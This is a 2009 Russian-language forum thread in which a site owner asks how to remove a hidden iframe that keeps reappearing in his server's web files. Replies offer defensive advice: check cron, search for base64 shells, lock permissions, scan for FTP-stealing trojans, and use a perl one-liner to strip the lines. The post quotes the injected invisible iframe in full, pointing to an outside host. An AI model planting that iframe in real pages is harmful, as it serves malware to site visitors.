Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
02.09.2009, 18:29
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме:
282022
Репутация:
4
|
|
как удалить iframe?
Млин, совсем меня извел, не могу не как удалить на сервере iframe, grep-ом ищу в файлах .php .shtml .html по названию iframe, чищу все что находит, но через какое-то время они опять заражаются, вот такой куйней
Код:
<iframe src="http://x3y.ru:8080/index.php" width=116 height=134 style="visibility: hidden"></iframe>
чье это? 
вообщем прошу помощи, уже несколько раз менял пароли на фтп и на рута, проверял свой локальный комп разными сканерами, curelt/AVZ/KasperskyVRT, поменял фтп клиента, но не помогло 
Последний раз редактировалось Gidz; 02.09.2009 в 18:37..
|
|
|
02.09.2009, 18:42
|
|
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
Провел на форуме:
2154209
Репутация:
341
|
|
проверь cron  ) |
|
|
|
02.09.2009, 18:52
|
|
Постоянный
Регистрация: 21.12.2007
Сообщений: 475
Провел на форуме:
1270580
Репутация:
387
|
|
Может у тебя хостера похакали?
|
|
|
|
02.09.2009, 19:50
|
|
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
Провел на форуме:
3718311
Репутация:
1118
|
|
поиши еще по base64 (шелл может) + пасс от ФТП смени (за дурака не держу, просто не писал ты о этом действии).
|
|
|
|
02.09.2009, 20:47
|
|
Участник форума
Регистрация: 06.03.2006
Сообщений: 122
Провел на форуме:
709545
Репутация:
72
|
|
Сообщение от Gidz
уже несколько раз менял пароли на фтп и на рута
Смени владельца файла и поставь права тока на чтение.
Но лучше курить логи и дырку латать 
|
|
|
|
05.09.2009, 21:00
|
|
Новичок
Регистрация: 04.09.2009
Сообщений: 23
Провел на форуме:
68004
Репутация:
10
|
|
Сам недавно столкнулся с этой заразой. Пришлось чистить сотни страниц на нескольких серверах.
Помог этот простенький скрипт (может кому пригодится чтобы не чистить руками):
Код:
find . -type f -name '*.php' | xargs perl -p -i -e 's/.*malware_domain.*$//g'
Б большинстве случаев причина заражения - на стороне клиента. Трой ворует пароли ftp - после делает конет на сервак, ищет файлы заглавных страниц index.php index.html main.html page.html и делает инъекцию кода.
Поэтому первое лекарство - свежий бесплатный антивирус с новыми базами http://www.freedrweb.com/cureit/ Ну и конечно же поиск багов на сайте. |
|
|
|
06.09.2009, 17:08
|
|
Новичок
Регистрация: 24.08.2007
Сообщений: 15
Провел на форуме:
174698
Репутация:
6
|
|
у вас троян пишет в скриптах iframe. создает себе место где пихает ссылки на ресурсы. он гадит скрипты и если это онлайн сайт, Гугл сканирует код и находит и считает как вредоносное ПО для компа. У меня было несколько таких случий на наших серверах. Рекомендую менять все пароли на сложные, очистить все скрипты, и поработать над дырами скриптов и улучшить безопасность. Потом, если это сайт, надо сообщить Гуглу что вы предприняли все меры чтоб скрипты работали нормально и чтоб они переиндексировали сайт.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
